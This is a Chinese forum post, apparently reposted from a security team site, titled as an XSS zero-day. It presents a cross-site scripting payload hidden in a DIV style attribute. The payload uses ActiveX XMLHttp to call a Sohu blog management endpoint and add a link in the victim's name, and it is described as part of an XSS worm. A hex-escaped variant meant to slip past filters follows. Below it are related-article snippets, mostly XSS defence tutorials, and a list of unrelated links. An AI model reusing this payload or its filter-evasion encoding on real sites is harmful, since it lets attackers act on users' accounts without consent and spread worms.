XSS 0DAY代码
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.
其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
相关推荐
-
XSS 0DAY代码
文章作者:茄子宝 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 看到梦之光芒放出来了!我也不藏了! 10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧. 其实很简单,就是两次转码. <DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("
-
PHP实现的防止跨站和xss攻击代码【来自阿里云】
本文实例讲述了PHP实现的防止跨站和xss攻击代码.分享给大家供大家参考,具体如下: 文档说明: 1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入.跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPC
-
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)
浅谈Php安全和防Sql注入,防止Xss攻击,防盗链,防CSRF 前言: 首先,笔者不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记.细心总结文章,里面有些是我们phper不易发现或者说不重视的东西.所以笔者写下来方便以后查阅.在大公司肯定有专门的web安全测试员,安全方面不是phper考虑的范围.但是作为一个phper对于安全知识是:"知道有这么一回事,编程时自然有所注意". 目录: 1.php一些安全配置(1)关闭php提示错误功能(2)关闭一些"坏
-
PHP实现表单提交数据的验证处理功能【防SQL注入和XSS攻击等】
本文实例讲述了PHP实现表单提交数据的验证处理功能.分享给大家供大家参考,具体如下: 防XSS攻击代码: /** * 安全过滤函数 * * @param $string * @return string */ function safe_replace($string) { $string = str_replace('%20','',$string); $string = str_replace('%27','',$string); $string = str_replace('%2527',
-
web网络安全分析反射型XSS攻击原理
目录 反射型XSS攻击 反射型XSS代码分析 反射型XSS攻击 页面http://127.0.0.1/xss/xss1.php实现的功能是在"输入"表单中输入内容,单击"提交"按钮后,将输入的内容放到"输出"表单中,例如当输入"11",单击"提交"按钮时,"11"将被输出到"输出"表单中,效果如图68所示. 图68 输入参数被输出到页面 当访问http://127.0
-
浅谈基于Token的WEB后台认证机制
几种常用的认证机制 HTTP Basic Auth HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password,简言之,Basic Auth是配合RESTful API 使用的最简单的认证方式,只需提供用户名密码即可,但由于有把用户名密码暴露给第三方客户端的风险,在生产环境下被使用的越来越少.因此,在开发对外开放的RESTful API时,尽量避免采用HTTP Basic Auth OAuth OAuth(开放授权)是一个开放的授权标准,允许用户让
-
Springboot实现XSS漏洞过滤的示例代码
背景 前阵子做了几个项目,终于开发完毕,进入了测试阶段,信心满满将项目部署到测试环境,然后做了安全测评之后..... (什么!你竟然说我代码不安全???) 然后测出了 Xss漏洞 安全的问题 解决方案 场景:可以在页面输入框输入JS脚本, 攻击者可以利用此漏洞执行恶意的代码 ! 问题演示 所以我们要对于前端传输的参数做处理,做统一全局过滤处理 既然要过滤处理,我们首先需要实现一个自定义过滤器 总共包含以下四部分 XssUtil XssFilterAutoConfig XssHttpSe
-
从网上搜到的phpwind 0day的代码
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Codz By 剑心</title><style type="text/css">body,td {font-family: "Tahoma";font-size: "12p
-
使用AngularJS中的SCE来防止XSS攻击的方法
这篇文章展示了有关XSS(跨站脚本)的不同方案以及怎样使用AngularJS中SCE($sceProvider),sanitize service这些特性来正确处理XSS.如果我遗漏了什么重要的地方请直接评论/建议.同时,错别字请见谅. 以下几点内容将是我接下来要讲述的重点: 全部转码HTML 安全插入HTML的同时忽略类似"script"这样的标签.如果不加以注意,这将一样存在风险同时也会丑化页面,尤其是在有"img"标签的时候. 依赖并插入纯HTML:这也有风险
-
Angular 4中如何显示内容的CSS样式示例代码
前言 在开始本文的正文之前,我们先来看一下angular2中将带标签的文本输出在页面上的相关内容,为了系统性的防范XSS问题,Angular默认把所有值都当做不可信任的. 当值从模板中以属性(Property).DOM元素属性(Attribte).CSS类绑定或插值表达式等途径插入到DOM中的时候, Angular将对这些值进行无害化处理(Sanitize),对不可信的值进行编码. h3>Binding innerHTML</h3> <p>Bound value:</p
随机推荐
- Tomcat之web应用的目录组成结构_动力节点Java学院整理
- iOS中searchBar(搜索框)光标初始位置后移
- ASP.NET读取RSS的方法
- 简单使用BackgroundWorker创建多个线程的教程
- js 实现图片预加载(js操作 Image对象属性complete ,事件onload 异步加载图片)
- 动态统计当前输入内容的字节、字符数的实例详解
- AMFPHP php远程调用(RPC, Remote Procedure Call)工具 快速入门教程
- php session的锁和并发
- Ajax中的循环方案
- Nodejs学习item【入门手上】
- PHP学习之SQL语句快速入门
- SQL Server2012在开发中的一些新特性
- jQuery分组选择器用法实例
- firefox浏览器下javascript 拖动层效果与原理分析代码
- C# FileStream文件读写详解
- C语言单向链表的表示与实现实例详解
- Apache2中实现多网站域名绑定的实现方法
- 用ASP实现距指定日期的倒记时程序源码
- sigsetjmp的用法总结
- 浅谈2路插入排序算法及其简单实现